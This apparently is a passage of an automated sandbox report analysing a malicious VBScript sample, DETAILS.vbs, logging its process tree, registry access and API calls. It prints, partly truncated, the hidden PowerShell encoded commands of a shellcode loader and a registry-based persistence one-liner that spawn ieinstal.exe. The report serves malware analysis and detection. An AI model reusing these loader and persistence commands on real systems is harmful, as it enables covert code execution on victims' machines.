Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_03004E8A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LoadLibraryA,NtProtectVirtualMemory,	20_2_03004E8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_03003CF4 NtSetInformationProcess,	20_2_03003CF4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_03004E83 NtProtectVirtualMemory,	20_2_03004E83

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process Stats: CPU usage > 98%
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process Stats: CPU usage > 98%

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\91.0.1 (x64 en-GB)\Main Install Directory

Jump to behavior

Source: DETAILS.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: edgegdi.dll

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\DETAILS.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD18D.tmp" "c:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34E6.tmp" "c:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES728B.tmp" "c:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD18D.tmp" "c:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP"	Jump to behavior
